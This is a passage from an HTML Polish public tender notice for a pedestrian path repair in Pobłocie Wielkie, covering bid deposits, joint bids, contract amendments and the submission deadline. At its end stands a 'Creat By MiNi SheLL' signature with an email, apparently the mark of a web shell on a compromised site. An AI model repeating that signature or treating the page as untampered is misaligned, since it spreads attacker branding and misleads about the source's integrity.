<br/>do dysponowania tymi osobami zgodnie ze wzorem określonym w Załączniku nr 7 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępując do przetargu wnosi wadium w wysokości 1 500,00 zł. <br/>2. Wykonawca może wnieść wadium w jednej lub w kilku następujących formach: <br/>1) pieniądzu, wpłaca się przelewem na rachunek bankowy Santander Bank Polska S.A. Nr: <br/>18 1090 2646 0000 0001 4677 2915 z dopiskiem w tytule:” WADIUM – REMONT DROGI DLA <br/>PIESZYCH W M. POBŁOCIE WIELKIE”. <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 <br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz. <br/>419 z późn. zm.). <br/>3. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być co najmniej <br/>gwarancją: bezwarunkową, nieprzenośną, nieodwołalną i płatną na pierwsze pisemne żądanie <br/>Zamawiającego. Gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać <br/>następujące elementy: <br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku <br/>lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, <br/>2) oznaczenie postępowania, <br/>3) określenie przedmiotu postępowania <br/>4) określenie wierzytelności, która ma być zabezpieczona gwarancją, <br/>5) kwotę gwarancji, <br/>6) termin ważności gwarancji, <br/>7) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie <br/>Zamawiającego, jeżeli: <br/>a) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 <br/>ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych <br/>lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w <br/>art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, <br/>innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa <br/>w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej <br/>przez wykonawcę jako najkorzystniejszej; <br/>b) wykonawca, którego ofertę wybrano: <br/> odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych <br/>w ofercie, <br/> nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, <br/>c) jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn <br/>leżących po stronie Wykonawcy, którego oferta została wybrana. <br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2)-4), <br/>wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>5. Termin wniesienia wadium. <br/>Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w <br/>pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, <br/>gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem <br/>terminu składania ofert. <br/>W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu jest warunkiem <br/>niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez <br/>Wykonawcę. <br/>6. Termin obowiązywania wadium. <br/>Wadium wniesione do postępowania przetargowego musi zabezpieczać ofertę przez cały okres związania <br/>ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna. w przypadku, kiedy ofertę składa kilka podmiotów, oferta musi spełniać następujące warunki:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta winna być podpisana przez ustanowionego pełnomocnika.<br/>3) Upoważnienie do pełnienia funkcji pełnomocnika wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty.<br/>4) Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego w SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>5) Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane. w takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonują poszczególni wykonawcy.<br/>7) Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>8) Oferta musi być podpisana przez Wykonawcę lub upoważnionych przedstawicieli Wykonawcy. Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W zakresie nieuregulowanym w umowie znajdują zastosowanie przepisy regulujące kwestię udzielania<br/>zamówień publicznych, a w zakresie niesprzecznym z tymi przepisami – Kodeks cywilny.<br/>2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem<br/>nieważności takiej zmiany z zachowaniem warunków przewidzianych w art. 455 Pzp.<br/>3. Zamawiający na podstawie art. 455 ust. 1 pkt 1 ustawy - Prawo zamówień publicznych przewiduje możliwość<br/>dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:<br/>1) zmiana terminu wykonania przedmiotu umowy;<br/>2) zmiana sposobu spełnienia świadczenia<br/>3) zmiana wynagrodzenia;<br/>4. Zmiana terminu wykonania przedmiotu umowy może nastąpić w następujących przypadkach:<br/>1) zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do<br/>uniknięcia przez Wykonawcę opóźnienie, w szczególności w przypadku wystąpienia klęsk żywiołowych, lub<br/>warunków atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających<br/>prowadzenie robót budowlanych,<br/>2) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały<br/>niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności wstrzymanie robót<br/>przez Zamawiającego,<br/>3) zmiany będące następstwem działania lub braku działania organów administracji i innych podmiotów, które<br/>spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności w<br/>przypadku, gdy wydanie przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.<br/>warunkuje rozpoczęcie lub kontynuowanie robót budowlanych, a decyzja, zezwolenie, uzgodnienie itp.<br/>zostały wydane po zawarciu umowy. W takim przypadku możliwe jest wydłużenie terminu lub terminów<br/>wykonania umowy maksymalnie o czas, jaki minął od dnia zawarcia umowy do dnia uzyskania ostatecznej<br/>decyzji, zezwolenia lub uzgodnienia,<br/>4) konieczność wykonania robót zamiennych lub zamówień dodatkowych.<br/>5. Zmiana sposobu spełnienia świadczenia może nastąpić w następujących przypadkach:<br/>1) zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/>a) z uwagi na możliwość osiągnięcia wymaganego efektu poprzez zastosowanie innych rozwiązań<br/>technicznych lub materiałowych zwiększających jakość, parametry techniczne lub eksploatacyjne<br/>obiektów budowlanych lub skracających termin realizacji zamówienia,<br/>b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na poniesienie<br/>niższych kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu<br/>umowy, lub umożliwiające uzyskanie lepszej jakości robót,<br/>c) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na skrócenie<br/>czasu realizacji inwestycji, jak również kosztów eksploatacji wykonanego przedmiotu umowy,<br/>d) zmiana decyzji, postanowień lub uzgodnień przez organy administracyjne i podmioty uzgadniające<br/>dokumentację projektową,<br/>e) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych<br/>lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>Pozostała treść w projektowanych postanowieniach umowy §15 - Załączniku nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-27 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-27 09:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> W przypadku gdy Zamawiający będzie przeprowadzał negocjacje, Zamawiający przewiduje możliwość ograniczenia liczby<br/>wykonawców, których zaprosi do negocjacji ofert. Zamawiający zaprosi do negocjacji trzech Wykonawców najwyżej<br/>ocenionych, którzy złożyli oferty które nie podlegają odrzuceniu w odpowiedzi na ogłoszenie o zamówieniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com